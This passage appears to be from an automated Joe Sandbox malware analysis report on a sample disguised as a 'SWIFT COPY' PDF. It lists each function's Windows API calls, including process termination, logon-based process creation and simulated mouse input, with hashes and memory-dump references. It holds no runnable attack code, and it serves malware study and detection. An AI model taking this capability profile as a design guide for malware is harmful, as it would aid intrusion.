                                                                                    • Opcode Fuzzy Hash: 00f5a0b2aebdf3f880167c7102ddb18e495c37a7bec92ff0d24913d27e010114
                                                                                    • Instruction Fuzzy Hash: 3E316F31A00205EBDB10EFA4DC89EAEB778FF85710F1480A9F905AB256D774DE10DBA0
                                                                                    Function 00979B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,009777F4,?,?,00000000,00000001), ref: 00979B53
                                                                                      • Part of subcall function 00976544: GetWindowRect.USER32(?,?), ref: 00976557
                                                                                    • GetDesktopWindow.USER32 ref: 00979B7D
                                                                                    • GetWindowRect.USER32(00000000), ref: 00979B84
                                                                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00979BB6
                                                                                      • Part of subcall function 00967A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00967AD0
                                                                                    • GetCursorPos.USER32(?), ref: 00979BE2
                                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00979C44
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                    • String ID:
                                                                                    • API String ID: 4137160315-0
                                                                                    • Opcode ID: f403806cf8ee5ed35b0a02779c0e8658b517d2fec48bd4edfb481ad393a8ae21
                                                                                    • Instruction ID: f87ea44666e2001e57a184b3666b4ab9d3fcd86084f03e5c6e2cca6afebe11d7
                                                                                    • Opcode Fuzzy Hash: f403806cf8ee5ed35b0a02779c0e8658b517d2fec48bd4edfb481ad393a8ae21
                                                                                    • Instruction Fuzzy Hash: B831CE72508305AFD710DF54D849B9AB7EDFF89314F00091AF589D7191DA31EA08CB92
                                                                                    Function 0095AF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0095AFAE
                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 0095AFB5
                                                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0095AFC4
                                                                                    • CloseHandle.KERNEL32(00000004), ref: 0095AFCF
                                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0095AFFE
                                                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 0095B012
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                    • String ID:
                                                                                    • API String ID: 1413079979-0
                                                                                    • Opcode ID: 7cbc1104efdc0eaa063ba87dd930b9ff3e37dc5f763db6e4fa087389178178b7
                                                                                    • Instruction ID: 35415bad21ff285dbca7b3d1b183b457bc3c1257663bc6bda98cb59482ebc9d5
                                                                                    • Opcode Fuzzy Hash: 7cbc1104efdc0eaa063ba87dd930b9ff3e37dc5f763db6e4fa087389178178b7
                                                                                    • Instruction Fuzzy Hash: AE2149B2105209AFDF02CFA5DD09BAE7BA9AF45305F044115FE02A2161C3769D29EBA1
                                                                                    Function 0098EBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0093AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0093AFE3
                                                                                      • Part of subcall function 0093AF83: SelectObject.GDI32(?,00000000), ref: 0093AFF2
                                                                                      • Part of subcall function 0093AF83: BeginPath.GDI32(?), ref: 0093B009
                                                                                      • Part of subcall function 0093AF83: SelectObject.GDI32(?,00000000), ref: 0093B033
                                                                                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0098EC20
                                                                                    • LineTo.GDI32(00000000,00000003,?), ref: 0098EC34
                                                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0098EC42
                                                                                    • LineTo.GDI32(00000000,00000000,?), ref: 0098EC52
                                                                                    • EndPath.GDI32(00000000), ref: 0098EC62
                                                                                    • StrokePath.GDI32(00000000), ref: 0098EC72
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                    • String ID:
                                                                                    • API String ID: 43455801-0
                                                                                    • Opcode ID: 7634e9807e36bac5d9d36bdca4eca4d914d6ce082bd143fb273a66412904cdd1
                                                                                    • Instruction ID: 86ba89e07bbc0251c82f71c6434f869156d9dfead69a8f458a06ef70663dfef6
                                                                                    • Opcode Fuzzy Hash: 7634e9807e36bac5d9d36bdca4eca4d914d6ce082bd143fb273a66412904cdd1
                                                                                    • Instruction Fuzzy Hash: 28113972004158BFEB029F90DC88EEA7F6DEF09350F048012BA4989160C7719E55EBA0
                                                                                    Function 0095E19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetDC.USER32(00000000), ref: 0095E1C0
                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0095E1D1
                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0095E1D8
                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0095E1E0
                                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0095E1F7
                                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0095E209
                                                                                      • Part of subcall function 00959AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00959A05,00000000,00000000,?,00959DDB), ref: 0095A53A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                    • String ID:
                                                                                    • API String ID: 603618608-0
                                                                                    • Opcode ID: 83f9b26e780e36f370b36756ffe3f318b40596f3982e8af512006d1f1f76b2ba
                                                                                    • Instruction ID: b522ee440ac36817ac088d94415c6a0903f7f46a9f59813d55bdb4af31f10808
                                                                                    • Opcode Fuzzy Hash: 83f9b26e780e36f370b36756ffe3f318b40596f3982e8af512006d1f1f76b2ba
                                                                                    • Instruction Fuzzy Hash: 08018FB5A44614BFEB109FA68C45B5EBFB8EF49351F008066EE05A7290D6719D01CFA0
                                                                                    Function 00947B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __init_pointers.LIBCMT ref: 00947B47
                                                                                      • Part of subcall function 0094123A: __initp_misc_winsig.LIBCMT ref: 0094125E
                                                                                      • Part of subcall function 0094123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00947F51
                                                                                      • Part of subcall function 0094123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00947F65
                                                                                      • Part of subcall function 0094123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00947F78
                                                                                      • Part of subcall function 0094123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00947F8B
                                                                                      • Part of subcall function 0094123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00947F9E
                                                                                      • Part of subcall function 0094123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00947FB1
                                                                                      • Part of subcall function 0094123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00947FC4
                                                                                      • Part of subcall function 0094123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00947FD7
                                                                                      • Part of subcall function 0094123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00947FEA
                                                                                      • Part of subcall function 0094123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00947FFD
                                                                                      • Part of subcall function 0094123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00948010
                                                                                      • Part of subcall function 0094123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00948023
                                                                                      • Part of subcall function 0094123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00948036
                                                                                      • Part of subcall function 0094123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00948049
                                                                                      • Part of subcall function 0094123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0094805C
                                                                                      • Part of subcall function 0094123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0094806F
                                                                                    • __mtinitlocks.LIBCMT ref: 00947B4C
                                                                                      • Part of subcall function 00947E23: InitializeCriticalSectionAndSpinCount.KERNEL32(009DAC68,00000FA0,?,?,00947B51,00945E77,009D6C70,00000014), ref: 00947E41
                                                                                    • __mtterm.LIBCMT ref: 00947B55
                                                                                      • Part of subcall function 00947BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00947B5A,00945E77,009D6C70,00000014), ref: 00947D3F
                                                                                      • Part of subcall function 00947BBD: _free.LIBCMT ref: 00947D46
                                                                                      • Part of subcall function 00947BBD: DeleteCriticalSection.KERNEL32(009DAC68,?,?,00947B5A,00945E77,009D6C70,00000014), ref: 00947D68
                                                                                    • __calloc_crt.LIBCMT ref: 00947B7A
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00947BA3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                    • String ID:
                                                                                    • API String ID: 2942034483-0
                                                                                    • Opcode ID: ccde78d3cedfeb62b6a11e609800916e13cce83e46c1f3ca0c996a390b76e59d
                                                                                    • Instruction ID: 155504bd4dce9c54a455f25b9b86126481841d5accd9a243ac9afcf8ff86dabc
                                                                                    • Opcode Fuzzy Hash: ccde78d3cedfeb62b6a11e609800916e13cce83e46c1f3ca0c996a390b76e59d
                                                                                    • Instruction Fuzzy Hash: 9BF0E93211D31A1DEA287BF47C07F4BA7C8DF82734B200BAAF964D55E2FF20884155A1
                                                                                    Function 009227EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0092281D
                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00922825
                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00922830
                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0092283B
                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00922843
                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 0092284B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual
                                                                                    • String ID:
                                                                                    • API String ID: 4278518827-0
                                                                                    • Opcode ID: 66c1e8e777d2e56ff71e08ebad51f19f1c47f3bf7dfff5971bc9a62905fb436e
                                                                                    • Instruction ID: 59462f591e5667a0d1ddb759d1b248865624261de3554216a25a6a1500685ce3
                                                                                    • Opcode Fuzzy Hash: 66c1e8e777d2e56ff71e08ebad51f19f1c47f3bf7dfff5971bc9a62905fb436e
                                                                                    • Instruction Fuzzy Hash: A50167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C47A42C7F5A864CBE5
                                                                                    Function 00969AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 1423608774-0
                                                                                    • Opcode ID: 5f8c806d46e5e6882ffa50d9ed85560053d1578370d4f996847151fd110722ac
                                                                                    • Instruction ID: d4f2fc7af4406b5f63816cfb26a237ed9f7cbcef3b557b609f4162d66248deb1
                                                                                    • Opcode Fuzzy Hash: 5f8c806d46e5e6882ffa50d9ed85560053d1578370d4f996847151fd110722ac
                                                                                    • Instruction Fuzzy Hash: EA01A436117211ABDB152B94ED48FEB77ADFFC9702B440429F903968A0DB749800EB90
                                                                                    Function 00967BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00967C07
                                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00967C1D
                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00967C2C
                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00967C3B
                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00967C45
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00967C4C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                    • String ID:
                                                                                    • API String ID: 839392675-0
                                                                                    • Opcode ID: d6cb116fc45cbdb0cd58ebd77ef7c854a96b82083a8e2412280c39359f1bd95e
                                                                                    • Instruction ID: ba68f53b6c0ba067c977c1b62627cb123b7d9ebed21290d2917e07f1b5d68bb0
                                                                                    • Opcode Fuzzy Hash: d6cb116fc45cbdb0cd58ebd77ef7c854a96b82083a8e2412280c39359f1bd95e
                                                                                    • Instruction Fuzzy Hash: B7F03A72256158BBE7215B929C0EEEF7B7CEFC7B15F040018FA0291451DBA05A41E6F5
                                                                                    Function 00969A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • InterlockedExchange.KERNEL32(?,?), ref: 00969A33
                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,00995DEE,?,?,?,?,?,0092ED63), ref: 00969A44
                                                                                    • TerminateThread.KERNEL32(?,000001F6,?,?,?,00995DEE,?,?,?,?,?,0092ED63), ref: 00969A51
                                                                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00995DEE,?,?,?,?,?,0092ED63), ref: 00969A5E
                                                                                      • Part of subcall function 009693D1: CloseHandle.KERNEL32(?,?,00969A6B,?,?,?,00995DEE,?,?,?,?,?,0092ED63), ref: 009693DB
                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 00969A71
                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,00995DEE,?,?,?,?,?,0092ED63), ref: 00969A78
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                    • String ID:
                                                                                    • API String ID: 3495660284-0
                                                                                    • Opcode ID: 4b4f962c9fb243e0ffaae0c1be5eafbc164c374ed3c1a77f7ae46e23cb0d9dac
                                                                                    • Instruction ID: ab4814aca8141dcc7bc5e7591587460b0023078c5df8fe3c6185c0f8a5a21b38
                                                                                    • Opcode Fuzzy Hash: 4b4f962c9fb243e0ffaae0c1be5eafbc164c374ed3c1a77f7ae46e23cb0d9dac
                                                                                    • Instruction Fuzzy Hash: EEF0827615A211ABD7112BA4EC8DFEB777DFFC6302B140425F903958A4DB799801EB90
                                                                                    Function 00921CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0093F4EA: std::exception::exception.LIBCMT ref: 0093F51E
                                                                                      • Part of subcall function 0093F4EA: __CxxThrowException@8.LIBCMT ref: 0093F533
                                                                                    • __swprintf.LIBCMT ref: 00921EA6
                                                                                    Strings
                                                                                    • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00921D49
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                                    • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                    • API String ID: 2125237772-557222456
                                                                                    • Opcode ID: d19d85bd394ff67056b8f7c7768f95b44042e5c68fa5aa16b0a99102e3d615b3
                                                                                    • Instruction ID: 283fcb3ab5b8fea66b9bd39e3a865e6d08d42c60c705bc2be291d1936faacf97
                                                                                    • Opcode Fuzzy Hash: d19d85bd394ff67056b8f7c7768f95b44042e5c68fa5aa16b0a99102e3d615b3
                                                                                    • Instruction Fuzzy Hash: 41917EB1108211AFCB24EF28DC95D6EB7A8BFD5700F01491DF895972A5DB30ED44CB92
                                                                                    Function 0097AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VariantInit.OLEAUT32(?), ref: 0097B006
                                                                                    • CharUpperBuffW.USER32(?,?), ref: 0097B115
                                                                                    • VariantClear.OLEAUT32(?), ref: 0097B298
                                                                                      • Part of subcall function 00969DC5: VariantInit.OLEAUT32(00000000), ref: 00969E05
                                                                                      • Part of subcall function 00969DC5: VariantCopy.OLEAUT32(?,?), ref: 00969E0E
                                                                                      • Part of subcall function 00969DC5: VariantClear.OLEAUT32(?), ref: 00969E1A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                    • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                    • API String ID: 4237274167-1221869570
                                                                                    • Opcode ID: ebc94089020e26a28b6a80852bf55b2c10bbfc231462e1471be5c8061bdba8f8
                                                                                    • Instruction ID: b43275d9a8efab86a827d617b1c1b10b25a0e799e929825dc1df1020e577ec1d
                                                                                    • Opcode Fuzzy Hash: ebc94089020e26a28b6a80852bf55b2c10bbfc231462e1471be5c8061bdba8f8
                                                                                    • Instruction Fuzzy Hash: 6A915C716083019FCB10DF24D495A5EB7E8EFC9704F04886EF89A9B3A2DB31E945CB52
                                                                                    Function 00965347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0093C6F4: _wcscpy.LIBCMT ref: 0093C717
                                                                                    • _memset.LIBCMT ref: 00965438
                                                                                    • GetMenuItemInfoW.USER32(?), ref: 00965467
                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00965513
                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0096553D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2160457038.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2160432454.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160517163.00000000009CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160572396.00000000009DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2160589711.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_920000_SWIFT COPY 0028_pdf.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                    • String ID: 0
                                                                                    • API String ID: 4152858687-4108050209
                                                                                    • Opcode ID: 5b0aeddf0884892b2d24279f4dbcd8c0f739c8bd7f8c803657ac725430bff845
                                                                                    • Instruction ID: 0f1a79163f05355deab27b78690e419c7346d422543430fd47862c11f84e907f
                                                                                    • Opcode Fuzzy Hash: 5b0aeddf0884892b2d24279f4dbcd8c0f739c8bd7f8c803657ac725430bff845
                                                                                    • Instruction Fuzzy Hash: 5C5103716187019BD7159F28C849BABB7ECEF85750F050A2EF896D32A0DB70CD448B92
